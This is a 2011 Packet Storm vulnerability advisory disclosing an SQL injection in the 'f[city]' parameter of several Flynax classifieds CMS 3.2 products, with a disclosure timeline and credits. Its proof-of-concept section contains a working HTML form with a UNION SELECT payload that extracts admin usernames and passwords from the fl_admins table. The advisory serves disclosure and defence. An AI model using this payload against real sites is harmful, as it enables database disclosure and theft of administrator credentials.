Flynax SQL Injection

2011-09-27T00:00:00
ID PACKETSTORM:105341
Type packetstorm
Reporter Matias Fontanini
Modified 2011-09-27T00:00:00

Description

                                        
                                            `I. BACKGROUND  
--------------  
  
Flynax is a software development company which produces several CMSs to mantain  
different kinds of classifieds websites.  
  
II. DESCRIPTION  
----------------  
  
Nasel members discovered a critical vulnerability in the front-end of  
these products.  
  
The vulnerability is an SQL injection in the advanced search,  
specifically in the "f[city]" parameter located at following files:  
- General Classifieds Software: dealers.html,  
- Real Estate Classifieds: agents-realtors.html.  
- Auto Classifieds Script: dealers.html  
- Pets Classifieds Software: dealers.html  
  
Exploiting this vulnerability can lead to a full disclosure of the database.  
  
  
III. AFFECTED PRODUCTS  
-----------------------  
  
- General Classifieds Software 3.2  
- Auto Classifieds Script 3.2  
- Real Estate Classifieds 3.2  
- Pets Classifieds Software 3.2  
  
IV. PoC  
------------  
  
<form action="http://site/path/dealers.html" method="post">  
Injection:<input value="') and 1=0 union all select  
1,2,3,4,concat_ws(0x3a, User,  
Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from  
fl_admins#" name="f[city]" type="text">  
<input type="hidden" name="search" value="true">  
<input type="hidden" value="" name="f[country]">  
<input type="submit" value="Send">  
</form>  
  
The name of the admin users table can differ depending on the product's version.  
  
V. CREDITS  
-----------  
  
This vulnerability was found by the Nasel Penetration Testing team formed by:  
- Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)  
- Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)  
- Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)  
- Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)  
  
VI. ADVISORY INFORMATION  
-------------------------  
  
2011-09-15  
==========  
  
Vulnerability Found. Vendor notification. Scheduled advisory release  
on September 25th, 2011.  
  
2011-09-17  
==========  
  
Vendor replied that the problem was fixed.  
  
2011-09-25  
==========  
  
Advisory released.  
  
--   
Nasel Penetration Testing Team  
http://www.nasel.com.ar  
`